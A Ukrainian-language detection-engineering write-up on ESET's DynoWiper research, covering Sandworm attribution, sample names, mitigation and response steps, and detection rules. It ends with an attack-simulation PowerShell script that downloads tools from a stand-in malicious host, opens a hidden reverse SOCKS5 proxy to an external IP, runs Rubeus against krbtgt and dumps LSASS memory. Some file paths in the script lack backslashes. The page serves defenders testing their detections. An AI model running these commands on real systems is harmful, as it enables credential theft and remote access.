Оновлення дослідження ESET DynoWiper: Технічний аналіз та атрибуція
Detection stack
- AIDR
- Alert
- ETL
- Query
Короткий огляд
DynoWiper — це деструктивний вайпер, використаний проти організації енергетичного сектору в Польщі, що вплинуло на кілька кінцевих точок в операціях. Виконувані файли були розміщені у спільній мережевій локації та запускалися безпосередньо з цієї локації. ESET приписує цю активність Sandworm з середньою впевненістю. Після виконання, зловмисне програмне забезпечення пошкоджує цільові файли випадковими байтами та ініціює примусовий перезавантаження для завершення впливу.
Розслідування
ESET виявила три зразки — schtask.exe, schtask2.exe і _update.exe, розміщені у C:inetpubpub. Вбудовані шляхи PDB вказують на те, що бінарні файли були скомпільовані у середовищі Vagrant. Зворотне проектування показало трьохетапну рутину витирання, з двома варіантами, що вставляли п’ятисекундну паузу між фазами. Артефакти після компрометації також включали інструмент Kerberos Rubeus і rsocx SOCKS5 проксі всередині мережі жертви.
Зменшення
ESET PROTECT на системах жертви заблокував усі три варіанти, обмежуючи шкоду. Зменште рівень ризику, запобігаючи створенню невиданих запланованих завдань і моніторингу несподіваних записів у спільні каталоги. Додайте список дозволених додатків і забороніть виконання з мережевих ресурсів, де це можливо.
Відповідь
Ідентифікуйте та ізолюйте хости, що запускають schtask.exe, schtask2.exe або *_update.exe з поділу. Збережіть нестійкі докази, перевірте заплановані завдання та сліди розгортання PowerShell, та усуньте інструменти, такі як Rubeus та rsocx. Завершіть повну судово-медичну експертизу і відновлюйте дані із перевірених чистих резервних копій.
Потік атаки
Виявлення
Можливе самоусунення шкідливого ПЗ або приховування Stderr (через командний рядок)
Переглянути
Вимкнення використовується для примусового зупинку або перезавантаження системи (через командний рядок)
Переглянути
IOC (HashSha1) для виявлення: Оновлення дослідження ESET DynoWiper: Технічний аналіз і атрибуція
Переглянути
IOC (SourceIP) для виявлення: Оновлення дослідження ESET DynoWiper: Технічний аналіз і атрибуція
Переглянути
IOC (DestinationIP) для виявлення: Оновлення дослідження ESET DynoWiper: Технічний аналіз і атрибуція
Переглянути
Виявлення розгортання DynoWiper через виконання запланованого завдання [Подія файлу Windows]
Переглянути
Виявлення шкідливих інструментів і дампу пам’яті LSASS [Створення процесу Windows]
Переглянути
Виконання симуляції
Передумова: Телеметрія і перевірка базової лінії повинні були пройти.
Підстави: Цей розділ детально описує точне виконання техніки супротивника (TTP), яка розроблена для запуску правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та мають на меті генерувати саме ту телеметрію, яка очікується логікою виявлення. Абстрактні або нерелевантні приклади призведуть до неправильної діагностики.
-
Розповідь про атаку та команди:
- Встановити зворотний проксі SOCKS5 використовуючи
rsocx.exe. Супротивник завантажує бінарний файл з зовнішнього сервера, розміщує його у%TEMP%, і запускає його з-r 31.172.71.5:8008аргументом для створення зворотного каналу до хоста C2. - Здійснити зловживання квитками Kerberos за допомогою
rubeus.exe. Інструмент виконується для запиту квитка надання квитків (TGT) Kerberos для облікового запису адміністратора домену та згодом фальшування службового квитка (s4u2self). - Вивантаження пам’яті LSASS використовуючи
procdump.exe(загальна альтернатива Диспетчеру завдань) для захоплення матеріалу облікових даних. Sysmon записує подію доступу до процесу, де процес атакувальникаprocdump.exeдоступа доlsass.exeз0x1010дозволеною маскою доступу (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
- Встановити зворотний проксі SOCKS5 використовуючи
-
Сценарій регресійного тестування:
# ------------------------------------------------------------- # Сценарій симуляції – запускає правило Sigma для rsocx, rubeus, # та дамп LSASS. Запустіть з привілеями адміністратора. # ------------------------------------------------------------- # 1. Розгорніть rsocx.exe (зворотний проксі SOCKS5) $rsocxPath = "$env:TEMPrsocx.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden # 2. Розгорніть rubeus.exe (зловживання Kerberos) $rubeusPath = "$env:TEMPrubeus.exe" Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden # 3. Вивантажте LSASS використовуючи procdump (вимагає Sysinternals) $procdumpPath = "$env:TEMPprocdump.exe" Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip" Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1 if ($procdumpExe) { Copy-Item $procdumpExe.FullName $procdumpPath -Force Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait } Write-Host "Симуляція завершена. Перевірте SIEM на наявність оповіщень." -
Команди очищення:
# Завершення всіх залишкових шкідливих процесів Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force # Видалення бінарних файлів та файлів дампу Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue # Необов'язково видалити тимчасові каталоги завантаження Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue Write-Host "Очищення завершено."